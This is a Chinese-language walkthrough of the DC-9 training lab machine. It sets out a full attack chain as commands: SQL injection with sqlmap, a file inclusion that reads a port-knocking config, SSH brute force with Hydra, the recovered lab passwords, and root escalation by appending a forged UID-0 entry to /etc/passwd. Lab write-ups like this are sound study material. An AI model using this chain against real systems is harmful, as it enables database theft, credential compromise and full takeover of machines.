DC-9 靶机渗透测试详细解析

一、环境搭建

• 攻击机：Kali Linux (IP: 192.168.200.14)
• 靶机：DC-9 (IP待发现)

二、信息收集

1. 发现靶机IP

使用ARP扫描发现同网段存活主机：

arp-scan -l

2. 端口扫描

发现开放端口：

• 80端口 (HTTP服务)
• 22端口 (SSH服务，初始未开放)

3. Web应用枚举

访问80端口Web服务：

• 主页面包含用户信息展示
• 存在搜索功能，可能存在XSS或SQL注入漏洞
• 登录页面需要正确凭证

三、漏洞探测与利用

1. SQL注入漏洞

使用SQLMap进行自动化注入：

方法一：使用请求文件

1. 将捕获的请求保存为1.txt
2. 获取数据库：

python sqlmap.py -r 1.txt --dbs --batch

3. 获取Staff数据库的表：

python sqlmap.py -r 1.txt -D Staff --tables

4. 获取Users表的字段：

python sqlmap.py -r 1.txt -D Staff -T Users --columns

5. 导出数据：

python sqlmap.py -r 1.txt -D Staff -T Users --dump

方法二：直接注入

python sqlmap.py -u "http://192.168.200.6/results.php" --data "search=1" --dbs

获取的凭证

• admin:transorbital1 (MD5: 856f5de590ef37314e7c3bdf6f8a66dc)

2. 文件包含漏洞

在manage.php页面发现文件包含漏洞：

• 可以读取系统文件如/etc/knockd.conf

3. 端口敲门机制

通过查看/etc/knockd.conf发现端口敲门序列：

nc 192.168.200.6 7469
nc 192.168.200.6 8475
nc 192.168.200.6 9842

敲门后22端口开放。

四、SSH爆破

使用Hydra爆破SSH：

hydra -L username.txt -P password.txt ssh://192.168.200.6

获取的有效凭证：

• chandlerb:UrAG0D!
• joeyt:Passw0rd
• janitor:Ilovepeepee

五、权限提升

1. 信息收集

在janitor家目录发现额外密码：

cd .secrets-for-putin/
cat passwords-found-on-post-it-notes.txt

获取更多密码：

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

2. 发现特权用户

使用新密码发现fredf用户：

• fredf:B4-Tru3-001

检查sudo权限：

sudo -l

发现fredf可以执行/opt/devstuff/dist/test/test

3. 利用test程序提权

test程序功能：将文件A内容附加到文件B

提权步骤：

1. 生成加密密码：

openssl passwd -1 -salt dc 123456

2. 创建伪造的passwd条目：

echo 'dc:$1$dc$5uDk4oYnRiBs0fFGlcRwy.:0:0:root:/bin/bash' >> /tmp/dc

3. 追加到/etc/passwd：

sudo ./test /tmp/dc /etc/passwd

4. 使用新创建的用户切换root：

su dc
密码：123456

六、总结

渗透路径：

1. 发现SQL注入 → 获取管理员凭证
2. 发现文件包含 → 获取端口敲门序列
3. 端口敲门 → 开启SSH
4. SSH爆破 → 获取多个用户凭证
5. 信息收集 → 发现更多密码
6. 特权程序滥用 → 提权至root